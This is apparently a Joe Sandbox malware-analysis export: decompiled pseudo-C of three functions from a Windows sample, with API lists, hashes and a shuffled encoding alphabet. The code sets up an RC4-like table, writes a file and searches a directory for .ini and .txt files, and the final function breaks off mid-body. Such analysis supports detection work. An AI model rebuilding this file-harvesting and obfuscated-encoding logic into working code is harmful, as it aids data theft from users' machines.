				if(E006EC430( *_t278) == 0) {
					L2:
					_t254 = _t288 + 0x130;
					E006F4520(_t254, 0x6c);
					_t288 = _t288 + 8;
					L3:
					_t115 =  *0x6f9b40; // 0x319000
					if(_t115 != 0) {
						E006E91E0(_t115);
						_t288 = _t288 + 4;
					}
					_t116 = E006EB7A0(_t254);
					_t289 = _t288 + 4;
					_t266 = 0;
					 *0x6f9b40 = _t116;
					_t117 = CreateFileW(_t254, 0xc0000000, 1, 0, 2, 0x80, 0); // executed
					 *(_t289 + 4) = _t117;
					if(_t117 == 0xffffffff) {
						L34:
						return _t266;
					} else {
						_t267 =  *((intOrPtr*)(_t278 + 0xc));
						if( *((intOrPtr*)(_t278 + 0xc)) != 0) {
							E006E1EA0(_t267);
							L006F7400(_t267);
							_t289 = _t289 + 4;
						}
						_t119 = E006E5140(0x10);
						_t290 = _t289 + 4;
						E006E61A0(_t119, 4, 0x400);
						 *((intOrPtr*)(_t278 + 0xc)) = _t119;
						_t269 =  *((intOrPtr*)(_t278 + 0x10));
						if( *((intOrPtr*)(_t278 + 0x10)) != 0) {
							E006E1EA0(_t269);
							L006F7400(_t269);
							_t290 = _t290 + 4;
						}
						_t121 = E006E5140(0x10);
						_t291 = _t290 + 4;
						E006E61A0(_t121, 4, 0x4000);
						 *((intOrPtr*)(_t278 + 0x10)) = _t121;
						_t123 = E006E8160(_t234);
						_t201 = 0;
						_t19 =  ~((_t123 * 0x38e38e39 >> 0x00000020 >> 0x00000001 & 0xfffffffe) + (_t123 * 0x38e38e39 >> 0x00000020 >> 0x00000001 & 0xfffffffe) * 8) + 2; // 0x2
						_push(_t278);
						_push(0);
						_push(_t123 + _t19);
						_push( *((intOrPtr*)(_t291 + 0x10)));
						E006E8A20(_t123 * 0x38e38e39 >> 0x00000020 >> 0x00000001 & 0xfffffffe);
						_t292 = _t291 + 0x10;
						_t280 = E006E8160(_t123 * 0x38e38e39 >> 0x00000020 >> 0x00000001 & 0xfffffffe) - (_t129 * 0xcccccccd >> 0x00000020 >> 0x00000002 & 0xfffffffe) + (_t129 * 0xcccccccd >> 0x00000020 >> 0x00000002 & 0xfffffffe) * 4;
						_t132 = E006E8160(_t129 * 0xcccccccd >> 0x00000020 >> 0x00000002 & 0xfffffffe);
						 *((intOrPtr*)(_t292 + 0xc)) = _t280;
						_t212 = _t132 - (_t132 * 0xcccccccd >> 0x00000020 >> 0x00000002 & 0xfffffffe) + (_t132 * 0xcccccccd >> 0x00000020 >> 0x00000002 & 0xfffffffe) * 4;
						_t35 = _t280 + 4; // 0x4
						 *((intOrPtr*)(_t292 + 0x24)) = _t212;
						 *((intOrPtr*)(_t292 + 0x10)) = _t212 + _t35;
						_t136 = E006E8160(_t132 * 0xcccccccd >> 0x00000020 >> 0x00000002 & 0xfffffffe);
						_t246 = _t136 * 0xcccccccd >> 0x00000020 >> 0x00000002 & 0xfffffffe;
						_t318 =  *0x6f9a80 - _t201; // 0x30f490
						 *((intOrPtr*)(_t292 + 8)) = _t136 - (_t136 * 0xcccccccd >> 0x00000020 >> 0x00000002 & 0xfffffffe) + (_t136 * 0xcccccccd >> 0x00000020 >> 0x00000002 & 0xfffffffe) * 4;
						if(_t318 != 0) {
							L14:
							_t281 =  *((intOrPtr*)(_t292 + 0xc)) + 3;
							 *((intOrPtr*)(_t292 + 0x28)) =  *((intOrPtr*)(_t292 + 8)) +  *((intOrPtr*)(_t292 + 0x10)) + 1;
							do {
								 *((char*)(_t292 + _t201 + 0x230)) = _t201;
								_t201 = _t201 + 1;
							} while (_t201 != 0x100);
							_push( *0x6f9a80);
							_push(_t292 + 0x330);
							_push(0x100);
							_push(_t292 + 0x230);
							_t144 = E006E7400(_t292 + 0x330, E006EB110());
							_t294 = _t292 + 0x18;
							_t202 = _t144;
							 *((intOrPtr*)(_t294 + 0x2c)) = 0;
							_t256 =  *((intOrPtr*)(_t294 + 0x54c));
							_t146 = E006E3CF0(_t294 + 0x2c, _t246, _t256, _t294 + 0x2c);
							_t295 = _t294 + 8;
							_t266 = 0;
							 *_t295 = _t146;
							if(_t146 == 0) {
								L30:
								_t247 =  *(_t295 + 4);
								L33:
								CloseHandle(_t247);
								goto L34;
							}
							_t216 =  *((intOrPtr*)(_t295 + 0x2c));
							if( *((intOrPtr*)(_t295 + 0x2c)) == 0) {
								goto L30;
							}
							 *((intOrPtr*)(_t295 + 0x1c)) = _t202;
							 *((intOrPtr*)(_t295 + 0x20)) = _t281;
							_t203 =  *(_t295 + 0xc);
							_t149 = E006F2E00( *(_t295 + 0xc), _t216, _t146);
							_t296 = _t295 + 0xc;
							if(_t149 == 0) {
								_t247 = _t203;
								goto L33;
							}
							_t150 = E006E3180(0x100, 0);
							_push(_t256);
							_t257 = _t150;
							_push(_t150);
							_push(0xa);
							_push(6);
							_t151 = E006F2C70(_t150, _t246);
							_t298 = _t296 + 0x18;
							_t282 = _t151;
							 *_t298 = _t151;
							_t152 = E006E3EB0();
							_t247 = _t203;
							if(_t152 == 0) {
								goto L33;
							}
							 *_t298 = 0;
							 *((intOrPtr*)(_t298 + 0x18)) = _t257;
							_t204 = _t298 + 0x30;
							_t266 = 0;
							_t258 = 0;
							_t218 =  *_t152 & 0x0000ffff;
							 *((intOrPtr*)(_t298 + 0x14)) = _t282 + _t257;
							if(_t218 == 0) {
								L24:
								_t284 = _t298 + 0x130;
								E006F7160(_t284, 0x6d);
								_t299 = _t298 + 8;
								_push( *((intOrPtr*)(_t299 + 0x28)));
								_push( *((intOrPtr*)(_t299 + 0x14)));
								_push( *((intOrPtr*)(_t299 + 0x28)));
								_push( *((intOrPtr*)(_t299 + 0x28)));
								_push(_t284);
								_push(0x80);
								_push(_t204);
								_t154 = E006EF0E0();
								_t300 = _t299 + 0x1c;
								_t155 = _t154 + _t258;
								 *_t300 = _t155;
								_push( *0x6f9a80);
								_push( *((intOrPtr*)(_t300 + 0x18)));
								_push(_t155);
								_push(_t300 + 0x3c);
								_t157 = E006EB110();
								_t301 = _t300 + 0x10;
								 *_t301 = _t157;
								_t262 =  *(_t301 + 0xc);
								_t159 = E006F2E00(_t262,  *((intOrPtr*)(_t301 + 0x18)),  *((intOrPtr*)(_t300 + 0x18)) + _t157 -  *((intOrPtr*)(_t301 + 0x18)));
								_t302 = _t301 + 0xc;
								if(_t159 == 0) {
									_t247 = _t262;
									goto L33;
								}
								_t205 =  *((intOrPtr*)(_t302 + 0x548));
								_push(_t205);
								_push( *((intOrPtr*)(_t302 + 0xc)) + 2);
								_push(0);
								_push(_t262);
								E006E8A20(_t247);
								_t303 = _t302 + 0x10;
								_t163 = E006E98C0();
								_t247 = _t262;
								if(_t163 == 0) {
									goto L33;
								}
								_t220 = 0;
								while( *((short*)(_t163 + _t220)) != 0) {
									_t220 = _t220 + 2;
									if(_t220 != 0x400) {
										continue;
									}
									_t266 = 0;
									goto L33;
								}
								_t273 = _t247;
								E006EAFA0(_t220, _t247, _t247, _t163, _t220, _t205);
								_t304 = _t303 + 0x10;
								_push(_t205);
								_push( *((intOrPtr*)(_t304 + 0x28)));
								_push(0);
								_t285 = _t273;
								_push(_t273);
								E006E8A20(_t247);
								_t305 = _t304 + 0x10;
								_t166 = E006E81B0();
								if(_t166 == 0) {
									_t266 = 0;
									L44:
									_t247 = _t285;
									goto L33;
								}
								_t222 = 0;
								_t247 = _t285;
								while( *((short*)(_t166 + _t222)) != 0) {
									_t222 = _t222 + 2;
									_t266 = 0;
									if(_t222 != 0x400) {
										continue;
									}
									goto L33;
								}
								E006EAFA0(_t222, _t247, _t247, _t166, _t222, _t205);
								_t306 = _t305 + 0x10;
								_t266 = 0;
								_push(_t205);
								_push( *((intOrPtr*)(_t306 + 0xc)));
								_push(0);
								_push(_t247);
								E006E8A20(_t247);
								_t307 = _t306 + 0x10;
								_t223 =  *0x6f9bd4; // 0x2ef510
								 *_t307 = 0;
								if(E006E1B50(_t223, _t307) == 0) {
									goto L44;
								}
								_t224 =  *_t307;
								_t247 = _t285;
								if( *_t307 != 0) {
									E006EAFA0(_t224, _t247, _t247, _t170, _t224, _t205);
									_t172 = E006E8160(_t247);
									_t104 =  ~((_t172 * 0xcccccccd >> 0x20 >> 2) + (_t172 * 0xcccccccd >> 0x20 >> 2) * 4) + 1; // 0x1
									_push(_t205);
									_push(_t172 + _t104);
									_push(0);
									_push(_t285);
									E006E8A20(_t172 * 0xcccccccd >> 0x20 >> 2);
									_t178 = E006E8160(_t172 * 0xcccccccd >> 0x20 >> 2);
									_t112 =  ~((_t178 * 0xcccccccd >> 0x20 >> 2) + (_t178 * 0xcccccccd >> 0x20 >> 2) * 4) + 1; // 0x1
									_push(_t205);
									_push(0);
									_push(_t178 + _t112);
									_push(_t285);
									E006E8A20(_t178 * 0xcccccccd >> 0x20 >> 2);
									_t247 = _t285;
									_t266 = 1;
								}
								goto L33;
							}
							_t206 = _t298 + 0x30;
							_t184 =  &(_t152[1]);
							while(1) {
								 *_t206 = _t218;
								_t204 =  &(_t206[0]);
								_t258 =  *_t298 + 1;
								 *_t298 = _t258;
								if(_t258 > 0x3f) {
									goto L24;
								}
								_t218 =  *_t184 & 0x0000ffff;
								_t184 =  &(_t184[1]);
								if(_t218 != 0) {
									continue;
								}
								goto L24;
							}
							goto L24;
						} else {
							_t185 = E006E3180(0x40, 0);
							_t276 = _t185;
							 *0x6f9a80 = _t185;
							E006EC400(_t185, "HJIA/CB+FGKLNOP3RSlUVWXYZfbcdeaghi5kmn0pqrstuvwx89o12467MEDyzQjT", 0x40);
							_t292 = _t292 + 0x14;
							_t287 = 0;
							goto L12;
							do {
								do {
									L12:
									_t187 = E006E8160(_t246);
									_t246 = _t187 * 0x38e38e39 >> 0x20 >> 1;
									_t228 = _t187 - (_t187 * 0x38e38e39 >> 0x20 >> 1) + (_t187 * 0x38e38e39 >> 0x20 >> 1) * 8;
								} while (_t228 == _t287);
								_t246 =  *((intOrPtr*)(_t276 + _t228 + 0x37));
								_t190 =  *((intOrPtr*)(_t276 + _t287 + 0x37));
								 *((char*)(_t276 + _t287 + 0x37)) =  *((intOrPtr*)(_t276 + _t228 + 0x37));
								_t287 = _t287 + 1;
								 *((char*)(_t276 + _t228 + 0x37)) = _t190;
							} while (_t287 != 9);
							goto L14;
						}
					}
				}
				_t196 = E006E8160(__edx);
				_t234 = _t196 % E006EC430( *_t278);
				_t254 =  *(E006E42F0( *_t278, _t196 % E006EC430( *_t278)));
				if(_t254 != 0) {
					goto L3;
				}
				goto L2;
			}

0x006ea4d0
0x006ea4da
0x006ea4eb
0x006ea513
0x006ea513
0x006ea51d
0x006ea522
0x006ea525
0x006ea525
0x006ea52c
0x006ea52f
0x006ea534
0x006ea534
0x006ea538
0x006ea53d
0x006ea540
0x006ea542
0x006ea558
0x006ea561
0x006ea565
0x006ea89d
0x006ea8a9
0x006ea56b
0x006ea56b
0x006ea570
0x006ea574
0x006ea57a
0x006ea57f
0x006ea57f
0x006ea584
0x006ea589
0x006ea597
0x006ea59c
0x006ea59f
0x006ea5a4
0x006ea5a8
0x006ea5ae
0x006ea5b3
0x006ea5b3
0x006ea5b8
0x006ea5bd
0x006ea5cb
0x006ea5d0
0x006ea5d3
0x006ea5df
0x006ea5ed
0x006ea5f1
0x006ea5f2
0x006ea5f3
0x006ea5f4
0x006ea5f8
0x006ea5fd
0x006ea617
0x006ea619
0x006ea622
0x006ea62f
0x006ea631
0x006ea635
0x006ea639
0x006ea63d
0x006ea649
0x006ea651
0x006ea657
0x006ea65b
0x006ea6af
0x006ea6b7
0x006ea6c2
0x006ea6c6
0x006ea6c6
0x006ea6cd
0x006ea6ce
0x006ea6e4
0x006ea6ea
0x006ea6eb
0x006ea6f0
0x006ea6fb
0x006ea700
0x006ea703
0x006ea709
0x006ea710
0x006ea718
0x006ea71d
0x006ea720
0x006ea724
0x006ea727
0x006ea88a
0x006ea88a
0x006ea896
0x006ea897
0x00000000
0x006ea897
0x006ea72d
0x006ea733
0x00000000
0x00000000
0x006ea739
0x006ea73d
0x006ea747
0x006ea74a
0x006ea74f
0x006ea754
0x006ea890
0x00000000
0x006ea890
0x006ea761
0x006ea769
0x006ea76a
0x006ea76c
0x006ea76d
0x006ea76f
0x006ea771
0x006ea776
0x006ea780
0x006ea782
0x006ea785
0x006ea78c
0x006ea78e
0x00000000
0x00000000
0x006ea794
0x006ea79d
0x006ea7a1
0x006ea7a5
0x006ea7a7
0x006ea7ac
0x006ea7af
0x006ea7b6
0x006ea7d9
0x006ea7d9
0x006ea7e3
0x006ea7e8
0x006ea7eb
0x006ea7ef
0x006ea7f3
0x006ea7f7
0x006ea7fb
0x006ea7fc
0x006ea801
0x006ea802
0x006ea807
0x006ea80a
0x006ea80c
0x006ea80f
0x006ea819
0x006ea81a
0x006ea81f
0x006ea820
0x006ea825
0x006ea828
0x006ea835
0x006ea83a
0x006ea83f
0x006ea844
0x006ea894
0x00000000
0x006ea894
0x006ea84a
0x006ea854
0x006ea855
0x006ea856
0x006ea858
0x006ea859
0x006ea85e
0x006ea867
0x006ea86e
0x006ea870
0x00000000
0x00000000
0x006ea872
0x006ea874
0x006ea87b
0x006ea884
0x00000000
0x00000000
0x006ea886
0x00000000
0x006ea886
0x006ea8ae
0x006ea8b0
0x006ea8b5
0x006ea8b8
0x006ea8b9
0x006ea8bd
0x006ea8bf
0x006ea8c1
0x006ea8c2
0x006ea8c7
0x006ea8d0
0x006ea8d7
0x006ea8f3
0x006ea999
0x006ea999
0x00000000
0x006ea999
0x006ea8d9
0x006ea8db
0x006ea8dd
0x006ea8e4
0x006ea8e7
0x006ea8ef
0x00000000
0x00000000
0x00000000
0x006ea8f1
0x006ea900
0x006ea905
0x006ea908
0x006ea90a
0x006ea90b
0x006ea90f
0x006ea910
0x006ea911
0x006ea916
0x006ea919
0x006ea921
0x006ea92b
0x00000000
0x00000000
0x006ea92d
0x006ea930
0x006ea934
0x006ea93e
0x006ea946
0x006ea95e
0x006ea962
0x006ea963
0x006ea964
0x006ea965
0x006ea966
0x006ea96e
0x006ea97f
0x006ea983
0x006ea984
0x006ea985
0x006ea986
0x006ea987
0x006ea98c
0x006ea993
0x006ea993
0x00000000
0x006ea934
0x006ea7b8
0x006ea7bc
0x006ea7bf
0x006ea7c2
0x006ea7c4
0x006ea7c5
0x006ea7c9
0x006ea7cc
0x00000000
0x00000000
0x006ea7ce
0x006ea7d1
0x006ea7d7
0x00000000
0x00000000
0x00000000
0x006ea7d7
0x00000000
0x006ea65d
0x006ea665
0x006ea66d
0x006ea66f
0x006ea67b
0x006ea680
0x006ea683
0x006ea683
0x006ea685
0x006ea685
0x006ea685
0x006ea685
0x006ea68e
0x006ea693
0x006ea695
0x006ea699
0x006ea69d
0x006ea6a1
0x006ea6a5
0x006ea6a6
0x006ea6aa
0x00000000
0x006ea685
0x006ea65b
0x006ea565
0x006ea4ed
0x006ea502
0x006ea50d
0x006ea511
0x00000000
0x00000000
0x00000000

APIs

CreateFileW.KERNELBASE(?,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 006EA558

Part of subcall function 006E8160: GetTickCount.KERNEL32(?,?,?,006E9394), ref: 006E8169

CloseHandle.KERNEL32(?), ref: 006EA897

Strings

HJIA/CB+FGKLNOP3RSlUVWXYZfbcdeaghi5kmn0pqrstuvwx89o12467MEDyzQjT, xrefs: 006EA675

Memory Dump Source

Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6e0000_______.jbxd

Similarity

API ID: CloseCountCreateFileHandleTick
String ID: HJIA/CB+FGKLNOP3RSlUVWXYZfbcdeaghi5kmn0pqrstuvwx89o12467MEDyzQjT
API String ID: 1536596348-2016521663
Opcode ID: 4883bedb5dc9802f50af9c34860104bd32c99116f4d5f17edacc7ad52655f08a
Instruction ID: 4ab51f6e81a23b8ab6edbf4d2106ee52525bb83ed3e6568794badab251499d88
Opcode Fuzzy Hash: 4883bedb5dc9802f50af9c34860104bd32c99116f4d5f17edacc7ad52655f08a
Instruction Fuzzy Hash: A1D148B1A053446FD761AF669C42BBB77DBEF84704F05452CF9498B382EA30AD06C792

Uniqueness

Uniqueness Score: -1.00%

Function 006EC7C0, Relevance: 4.7, APIs: 3, Instructions: 222
fileCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E006EC7C0() {
				void* _t70;
				void** _t71;
				void* _t73;
				void* _t74;
				int _t75;
				void* _t77;
				void* _t78;
				void* _t79;
				signed int _t81;
				void* _t83;
				intOrPtr _t84;
				short* _t86;
				signed short* _t88;
				void* _t90;
				signed int _t92;
				void* _t93;
				void* _t94;
				void* _t95;
				void** _t96;
				signed int _t97;
				void* _t98;
				void* _t101;
				signed short* _t102;
				signed int _t103;
				signed int _t104;
				void** _t105;
				void* _t106;
				signed int _t107;
				signed int _t108;
				signed int _t109;
				signed int _t110;
				signed int _t111;
				signed int _t112;
				struct _WIN32_FIND_DATAW* _t113;
				signed int _t120;
				void** _t124;

				_t93 = _t124[0x29c];
				_t108 = 0;
				if(_t93 != 0) {
					_t70 = _t124[0x29b];
					 *0x6f9bd4 = _t93;
					_t94 = 0xfffffc00;
					while(1) {
						_t103 =  *(_t70 + _t94 + 0x400) & 0x0000ffff;
						if(_t103 == 0) {
							break;
						}
						 *(_t124 + _t94 + 0x658) = _t103;
						_t94 = _t94 + 2;
						if(_t94 != 0) {
							continue;
						} else {
							 *((short*)(_t124 + _t94 + 0x656)) = 0;
						}
						goto L67;
					}
					 *(_t124 + _t94 + 0x658) = 0;
					_t71 =  &(_t124[0x96]);
					_t95 = 0x200;
					while( *_t71 != 0) {
						_t71 =  &(_t71[0]);
						_t95 = _t95 - 1;
						if(_t95 != 0) {
							continue;
						} else {
						}
						goto L67;
					}
					_t111 = 0;
					while(1) {
						_t104 = _t111;
						_t13 = _t111 + 0x6f9ba4; // 0x2a005c
						_t112 =  *(_t111 + _t13) & 0x0000ffff;
						if(_t112 == 0) {
							break;
						}
						 *(_t71 + _t104 * 2) = _t112;
						_t16 = _t104 + 1; // 0x1
						_t111 = _t16;
						if(_t95 != _t111) {
							continue;
						} else {
							L12:
							 *(_t71 + _t104 * 2) = 0;
							L13:
							_t108 = 0;
						}
						goto L67;
					}
					_t113 =  &(_t124[2]);
					 *(_t71 + _t104 * 2) = 0;
					_t73 = FindFirstFileW( &(_t124[0x96]), _t113); // executed
					_t108 = 0;
					 *_t124 = _t73;
					if(_t73 != 0xffffffff) {
						_t74 = 0xfffffc00;
						while( *((short*)(_t124 + _t74 + 0x658)) != 0) {
							_t74 = _t74 + 2;
							if(_t74 != 0) {
								continue;
							} else {
							}
							goto L67;
						}
						 *((short*)(_t124 + _t74 + 0x656)) = 0;
						do {
							_t108 = 0;
							if((_t124[2] & 0x00000010) != 0) {
								goto L64;
							} else {
								_t77 = 0;
								_t105 =  &(_t124[0xc]);
								_t96 =  &(_t124[0xd]);
								while( *_t96 != 0) {
									_t77 = _t77 + 2;
									_t96 =  &(_t96[0]);
									_t105 =  &(_t105[0]);
									if(_t77 != 0x400) {
										continue;
									} else {
										L51:
										_t108 = 0;
										goto L64;
									}
									goto L67;
								}
								_t88 = _t96 - 2;
								_t108 = 0;
								if(_t88 <=  &(_t124[0xd])) {
									goto L64;
								} else {
									_t108 = 0;
									_t120 = 0;
									if(( *_t88 & 0x0000ffff) != 0x2e) {
										_t92 = 1;
										while(1) {
											_t102 = _t105;
											_t120 = _t92;
											if(_t102 <=  &(_t124[0xd])) {
												break;
											}
											_t60 = _t120 + 1; // 0x2
											_t92 = _t60;
											_t105 = _t102 - 2;
											if(( *_t102 & 0x0000ffff) != 0x2e) {
												continue;
											}
											break;
										}
										_t96 =  &(_t102[1]);
										_t113 =  &(_t124[2]);
									}
									if(_t120 != 3) {
										goto L64;
									} else {
										_t106 =  *_t96;
										if(_t106 == 0x6e0069) {
											if(_t96[1] != 0x69) {
												goto L64;
											} else {
												goto L21;
											}
										} else {
											if(_t106 != 0x780074) {
												goto L64;
											} else {
												if(_t96[1] == 0x74) {
													L21:
													_t78 = E006E3180(_t77, 0);
													_t124 =  &(_t124[2]);
													if(_t78 == 0) {
														goto L64;
													} else {
														_t79 = 0xfffffc00;
														while(1) {
															_t97 =  *(_t124 + _t79 + 0x658) & 0x0000ffff;
															if(_t97 == 0) {
																break;
															}
															 *(_t124 + _t79 + 0xa58) = _t97;
															_t79 = _t79 + 2;
															if(_t79 != 0) {
																continue;
															} else {
																 *((short*)(_t124 + _t79 + 0xa56)) = 0;
																goto L13;
															}
															goto L67;
														}
														 *(_t124 + _t79 + 0xa58) = 0;
														_t98 = 0x200;
														_t71 =  &(_t124[0x196]);
														while( *_t71 != 0) {
															_t71 =  &(_t71[0]);
															_t108 = 0;
															_t98 = _t98 - 1;
															if(_t98 != 0) {
																continue;
															} else {
															}
															goto L67;
														}
														_t109 = 0;
														while(1) {
															_t104 = _t109;
															_t110 =  *(_t124 + 0x34 + _t109 * 2) & 0x0000ffff;
															if(_t110 == 0) {
																break;
															}
															 *(_t71 + _t104 * 2) = _t110;
															_t40 = _t104 + 1; // 0x1
															_t109 = _t40;
															if(_t98 != _t109) {
																continue;
															} else {
																goto L12;
															}
															goto L67;
														}
														 *(_t71 + _t104 * 2) = 0;
														_push(0);
														_push( &(_t124[0x197]));
														_t81 = E006EC510( &(_t124[0x197]), _t98);
														_t124 =  &(_t124[2]);
														if(_t81 == 0) {
															goto L51;
														} else {
															_t108 = _t81;
															_t90 = 2;
															_t83 = 0xffffffffffffffff;
															while( *((short*)(_t124 + _t90 + 0x656)) != 0) {
																_t83 = _t83 - 1;
																_t90 = _t90 + 2;
																if(_t83 != 0xfffffdff) {
																	continue;
																} else {
																}
																goto L67;
															}
															_t124[1] = _t83;
															_t84 =  *0x6f9b40; // 0x319000
															if(_t84 != 0) {
																E006E91E0(_t84);
																_t124 =  &(_t124[1]);
															}
															_t86 = E006E3180(_t90, 0);
															_t124 =  &(_t124[2]);
															 *0x6f9b40 = _t86;
															if( ~(_t124[1]) <= 0) {
																if(_t90 != 0) {
																	 *_t86 = 0;
																}
															} else {
																_t101 = 0;
																while(1) {
																	_t107 =  *(_t124 + _t101 + 0x658) & 0x0000ffff;
																	if(_t107 == 0) {
																		break;
																	}
																	 *(_t86 + _t101) = _t107;
																	_t101 = _t101 + 2;
																	if(_t90 != _t101) {
																		continue;
																	} else {
																		 *((short*)(_t86 + _t101 - 2)) = 0;
																	}
																	goto L67;
																}
																 *(_t86 + _t101) = 0;
																goto L64;
															}
														}
													}
												} else {
													goto L64;
												}
											}
										}
									}
								}
							}
							goto L67;
							L64:
							_t75 = FindNextFileW(_t124[1], _t113);
						} while (_t108 == 0 && _t75 != 0);
						FindClose( *_t124);
					}
				}
				L67:
				return _t108;
			}

0x006ec7ca
0x006ec7d1
0x006ec7d5
0x006ec7db
0x006ec7e2
0x006ec7e8
0x006ec7ed
0x006ec7ed
0x006ec7f8
0x00000000
0x00000000
0x006ec7fa
0x006ec802
0x006ec805
0x00000000
0x006ec807
0x006ec807
0x006ec807
0x00000000
0x006ec805
0x006ec816
0x006ec820
0x006ec827
0x006ec82c
0x006ec832
0x006ec835
0x006ec836
0x00000000
0x00000000
0x006ec838
0x00000000
0x006ec836
0x006ec83d
0x006ec83f
0x006ec83f
0x006ec841
0x006ec841
0x006ec84c
0x00000000
0x00000000
0x006ec84e
0x006ec852
0x006ec852
0x006ec857
0x00000000
0x006ec859
0x006ec859
0x006ec859
0x006ec85f
0x006ec85f
0x006ec85f
0x00000000
0x006ec857
0x006ec866
0x006ec86a
0x006ec879
0x006ec87f
0x006ec884
0x006ec887
0x006ec88d
0x006ec892
0x006ec89d
0x006ec8a0
0x00000000
0x00000000
0x006ec8a2
0x00000000
0x006ec8a0
0x006ec8ad
0x006ec9ee
0x006ec9f3
0x006ec9f8
0x00000000
0x006ec9fe
0x006ec9fe
0x006eca00
0x006eca04
0x006eca08
0x006eca0e
0x006eca11
0x006eca14
0x006eca1c
0x00000000
0x006eca1e
0x006eca1e
0x006eca1e
0x00000000
0x006eca1e
0x00000000
0x006eca1c
0x006eca24
0x006eca2b
0x006eca37
0x00000000
0x006eca39
0x006eca3c
0x006eca3e
0x006eca46
0x006eca4a
0x006eca4b
0x006eca4b
0x006eca51
0x006eca55
0x00000000
0x00000000
0x006eca5a
0x006eca5a
0x006eca5d
0x006eca63
0x00000000
0x00000000
0x00000000
0x006eca63
0x006eca65
0x006eca68
0x006eca68
0x006eca6f
0x00000000
0x006eca71
0x006eca71
0x006eca79
0x006ec8c6
0x00000000
0x00000000
0x00000000
0x00000000
0x006eca7f
0x006eca8b
0x00000000
0x006eca8d
0x006eca91
0x006ec8cc
0x006ec8cf
0x006ec8d4
0x006ec8d9
0x00000000
0x006ec8df
0x006ec8df
0x006ec8e4
0x006ec8e4
0x006ec8ef
0x00000000
0x00000000
0x006ec8f1
0x006ec8f9
0x006ec8fc
0x00000000
0x006ec8fe
0x006ecac8
0x00000000
0x006ecac8
0x00000000
0x006ec8fc
0x006ec903
0x006ec90d
0x006ec912
0x006ec919
0x006ec91f
0x006ec922
0x006ec924
0x006ec925
0x00000000
0x00000000
0x006ec927
0x00000000
0x006ec925
0x006ec92c
0x006ec92e
0x006ec92e
0x006ec930
0x006ec938
0x00000000
0x00000000
0x006ec93a
0x006ec93e
0x006ec93e
0x006ec943
0x00000000
0x006ec945
0x00000000
0x006ec945
0x00000000
0x006ec943
0x006ec94a
0x006ec950
0x006ec959
0x006ec95a
0x006ec95f
0x006ec964
0x00000000
0x006ec96a
0x006ec96a
0x006ec96e
0x006ec973
0x006ec974
0x006ec97f
0x006ec980
0x006ec988
0x00000000
0x00000000
0x006ec98a
0x00000000
0x006ec988
0x006ec98f
0x006ec993
0x006ec99a
0x006ec99d
0x006ec9a2
0x006ec9a2
0x006ec9a9
0x006ec9ae
0x006ec9b5
0x006ec9be
0x006ecae2
0x006ecae4
0x006ecae4
0x006ec9c4
0x006ec9c4
0x006ec9c6
0x006ec9c6
0x006ec9d1
0x00000000
0x00000000
0x006ec9d3
0x006ec9d7
0x006ec9dc
0x00000000
0x006ec9de
0x006ecad7
0x006ecad7
0x00000000
0x006ec9dc
0x006ec9e3
0x00000000
0x006ec9e3
0x006ec9be
0x006ec964
0x006eca97
0x00000000
0x006eca97
0x006eca91
0x006eca8b
0x006eca79
0x006eca6f
0x006eca37
0x00000000
0x006eca9f
0x006ecaa4
0x006ecaa6
0x006ecab5
0x006ecab5
0x006ec887
0x006ecabb
0x006ecac7

APIs

FindFirstFileW.KERNELBASE(?,?), ref: 006EC879
FindNextFileW.KERNEL32(?,?), ref: 006ECAA4
FindClose.KERNEL32 ref: 006ECAB5

Part of subcall function 006E3180: GetProcessHeap.KERNEL32(00000000,00000000,006F2549,?,00000000,00000001,00000000), ref: 006E3193
Part of subcall function 006E3180: RtlReAllocateHeap.NTDLL(002B0000,00000008,?,?), ref: 006E31B0

Memory Dump Source

Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6e0000_______.jbxd

Similarity

API ID: Find$FileHeap$AllocateCloseFirstNextProcess
String ID:
API String ID: 2373226758-0
Opcode ID: 6c9313f2570e43a41ce651680e2c0d85428f829c605c6d0c0397f639154207ef
Instruction ID: 72ab40895d235b738b739d0ca5cd2de1b006f9ba4d94ac39cfdadb26ccdee9f5
Opcode Fuzzy Hash: 6c9313f2570e43a41ce651680e2c0d85428f829c605c6d0c0397f639154207ef
Instruction Fuzzy Hash: 8F81E1715067988AD7209B2AEC457FB73E7BF90324F25443ED8458B3A1EB758843C792

Uniqueness

Uniqueness Score: -1.00%

Function 006F6780, Relevance: 3.1, APIs: 2, Instructions: 116
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E006F6780(void* __ecx) {
				intOrPtr _t16;
				void* _t17;
				void* _t22;
				void* _t24;
				intOrPtr _t27;
				intOrPtr _t32;
				void* _t33;
				void* _t36;
				void* _t37;
				intOrPtr _t42;
				void* _t45;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				intOrPtr* _t53;
				intOrPtr* _t54;
				void* _t56;
				intOrPtr* _t57;

				_t16 =  *0x6f9a88; // 0x2ffc88
				_t36 = 0;
				 *((intOrPtr*)(_t53 + 8)) = 0x280;
				 *_t53 = 0;
				 *((intOrPtr*)(_t53 + 4)) = 0;
				if(_t16 != 0) {
					E006E91E0(_t16);
					_t53 = _t53 + 4;
					 *0x6f9a88 = 0;
				}
				_t17 = E006E3180(0x280, 0);
				_t54 = _t53 + 8;
				_t49 = _t17;
				if(_t17 == 0) {
					_t45 = _t49;
					_t49 = 0;
					goto L14;
				} else {
					_t37 = _t54 + 8;
					_t22 =  *0x6f9f0c(_t49, _t37); // executed
					if(_t22 != 0x6f) {
						_t46 = _t49;
						L8:
						 *((intOrPtr*)(_t54 + 0xc)) = _t46;
						_t6 = _t46 + 8; // 0x8
						_push(0x800c);
						_push(_t54 + 4);
						_push(_t54);
						_push(0x194);
						_t24 = E006EF800();
						_t36 = 0;
						if(_t24 == 0) {
							L18:
							return _t36;
						}
